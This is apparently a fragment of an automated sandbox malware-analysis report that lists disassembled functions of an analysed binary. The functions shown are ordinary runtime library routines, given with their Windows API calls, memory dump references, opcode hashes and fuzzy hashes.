                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                                                    • Opcode ID: 25fbb9708095a9377b1fb6c8f5532864dafcee38f414fcb4c0fc9bbc766f7aca
                                                                                                                                                                                                                                                    • Instruction ID: e334ae6e2ecc854d0137d3c593b5f6c2444301ff7a771e3fadbd1452fdc6f66f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25fbb9708095a9377b1fb6c8f5532864dafcee38f414fcb4c0fc9bbc766f7aca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D11063B2003015FDB18AF39C9916BABB92FB90319B14842DE94B47B40D3B5A942D744
                                                                                                                                                                                                                                                    Function 0047327E Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: GetLastError.KERNEL32(00000000,?,00470AB9), ref: 0046E787
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: SetLastError.KERNEL32(00000000,?,?,00000028,0046B9D2), ref: 0046E829
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00472F1B,00000000,00000000,?), ref: 004732AA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                                                                                                    • Opcode ID: c79f3d2ed97bb3e8098e360268f16033ab3ff69b7439cd5e6a7822331cde2ef5
                                                                                                                                                                                                                                                    • Instruction ID: eb931f627c5655fe6eca21000eec4e403de010cc6e3bdd307af35a4754f6afd3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c79f3d2ed97bb3e8098e360268f16033ab3ff69b7439cd5e6a7822331cde2ef5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62012B366401127BDB185E35C80ABFB3754DB40B16F15846EEC1AA3180EA79EF41D69C
                                                                                                                                                                                                                                                    Function 00472F52 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: GetLastError.KERNEL32(00000000,?,00470AB9), ref: 0046E787
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: SetLastError.KERNEL32(00000000,?,?,00000028,0046B9D2), ref: 0046E829
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00472FB1,00000001,?,?,-00000050,?,00472AB7,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00472F9C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                                                    • Opcode ID: c52daaef756229b88d558c14494c670448c67922a8bfc4b2a4a224fe6a4029e6
                                                                                                                                                                                                                                                    • Instruction ID: eda25489b078df9d31654968e5fd45c7df71ab8c293596ffd9e3175f81f5b3d9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c52daaef756229b88d558c14494c670448c67922a8bfc4b2a4a224fe6a4029e6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5F0F6362003046FDB245F399C85ABB7BA1EF80768B15C42EF9498B780D7F59D42D758
                                                                                                                                                                                                                                                    Function 0046F717 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0046B750: EnterCriticalSection.KERNEL32(-00023A67,?,00468F5A,00000000,004844D8,0000000C,00468F13,?,?,0046F83A,?,?,0046E921,00000001,00000364,004631E1), ref: 0046B75F
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0046F70A,00000001,00484928,0000000C,0046F118,-00000050), ref: 0046F74F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                                                                                                                    • Opcode ID: 18eb7c56cb594776378f2aabce335dca47ba3e229c130f20daa46f5bdfdaebf0
                                                                                                                                                                                                                                                    • Instruction ID: 772b99c56cdb1fcfc2a3acfa14dd2ecc0f0599632160cc78b6868d77ba788cb6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18eb7c56cb594776378f2aabce335dca47ba3e229c130f20daa46f5bdfdaebf0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5F03772A04204DFD700EFA9E842B9D77B0EB48726F10856EE510DB2A0DB7989048F89
                                                                                                                                                                                                                                                    Function 00473086 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: GetLastError.KERNEL32(00000000,?,00470AB9), ref: 0046E787
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: SetLastError.KERNEL32(00000000,?,?,00000028,0046B9D2), ref: 0046E829
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(004730D1,00000001,?,?,?,00472B11,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 004730BD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                                                    • Opcode ID: 0d8c8fb44814d26de93c56229c64b09fc727f6a210e1f8d7447b4d7af9fb8122
                                                                                                                                                                                                                                                    • Instruction ID: 09c36af58a13331a044b82dde1b118fd360edc6855ba65aca3f9e7ef38d60388
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d8c8fb44814d26de93c56229c64b09fc727f6a210e1f8d7447b4d7af9fb8122
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3F0A33A30024557CB049F36C8057AB7F90EFC1715F06405DEE098B350C675D943D794
                                                                                                                                                                                                                                                    Function 0046F21C Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,0046A4BC,?,20001004,00000000,00000002,?,?,004693CE), ref: 0046F250
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                                                                    • Opcode ID: 6d7bc5e68a0c6faedd24fad185b52eb682a5affdb03aca594c710fb54d3d47e5
                                                                                                                                                                                                                                                    • Instruction ID: 73eb364ed9048d7cfc3d4273726560ab597c5b0dbbfc2a1937d1bc5f2a7085b3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d7bc5e68a0c6faedd24fad185b52eb682a5affdb03aca594c710fb54d3d47e5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51E0DF32400218BBCF122F61EC04AAE3F15EF44B61F004436FC4061221DB768D21AB9E
                                                                                                                                                                                                                                                    Function 00465014 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00005135), ref: 00465019
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                    • Opcode ID: adf8bede6df365537adb85ef0aa04ff3a4c735868954151a84017ab81f0313d7
                                                                                                                                                                                                                                                    • Instruction ID: 7aa38124d21cea14c6e57e5eb035a461c34964806fc330d2355c2bcd9f474f64
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: adf8bede6df365537adb85ef0aa04ff3a4c735868954151a84017ab81f0313d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    Function 0046FE2C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                                                    • Opcode ID: bd569f4e6ae4864f6fc16c66c5e21629d51adb2dfe711fdc19633b49ff416cb9
                                                                                                                                                                                                                                                    • Instruction ID: 2b961580bc8d3ea2b847a22b2cee7033f295b3aa3adf7cdbb393a23d14d5153c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd569f4e6ae4864f6fc16c66c5e21629d51adb2dfe711fdc19633b49ff416cb9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABA002B09051019B97408F35A94570D3A995545991706447DE515C5160D765C5515F05
                                                                                                                                                                                                                                                    Function 0047A222 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(0153FE70,0153FE70,00000000,7FFFFFFF,?,0047A20D,0153FE70,0153FE70,00000000,0153FE70,?,?,?,?,0153FE70,00000000), ref: 0047A2C8
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0047A383
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0047A412
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0047A45D
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0047A463
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0047A499
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0047A49F
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0047A4AF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 127012223-0
                                                                                                                                                                                                                                                    • Opcode ID: 75543ebc59bbc148a6c849bc21f4437c981ef6e3ec5d008ab78a3477b356e1b1
                                                                                                                                                                                                                                                    • Instruction ID: c76d257dc455054d6c99777ad4e2e120d7f270314b925c062be4f4dfc8078b62
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75543ebc59bbc148a6c849bc21f4437c981ef6e3ec5d008ab78a3477b356e1b1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE71E672900205ABDF219E958C45BEF77B69FC5314F28805BED08A7341E67E9C24879F
                                                                                                                                                                                                                                                    Function 004654C5 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0046550C
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00465538
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00465577
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00465594
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004655D3
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 004655F0
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00465632
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00465655
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2040435927-0
                                                                                                                                                                                                                                                    • Opcode ID: 12082bb70538037ae4e0d0a643710b961899e3e19586e637d904c7ae15c6a020
                                                                                                                                                                                                                                                    • Instruction ID: fc510f7b856f5850ba6dcdd640c38a17df6d36bab94583b3f3423f741935174b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12082bb70538037ae4e0d0a643710b961899e3e19586e637d904c7ae15c6a020
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E51C072600606AFEF205F65CC45FBF7BA9EF40B44F54442AF90996250EB38CD10CB9A
                                                                                                                                                                                                                                                    Function 004661E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00466217
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0046621F
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004662A8
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004662D3
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00466328
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: e25cf336cfeb6f21760fbddc79134b350ca98b49ce57417a6af465223a8b2812
                                                                                                                                                                                                                                                    • Instruction ID: 29f26278bb63bb0c95f3960a64e5ff689d924870a55df89f2f09290266912882
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e25cf336cfeb6f21760fbddc79134b350ca98b49ce57417a6af465223a8b2812
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE41E934A002149FCF10EF69C890A9E7BB5EF45318F15859BE8145B352EB39DE05CBDA
                                                                                                                                                                                                                                                    Function 0046F469 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,0046F578,0046186A,?,00000000,004631E1,0046186C,?,0046F1F6,00000022,FlsSetValue,0047DFE0,8,H,004631E1), ref: 0046F52A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
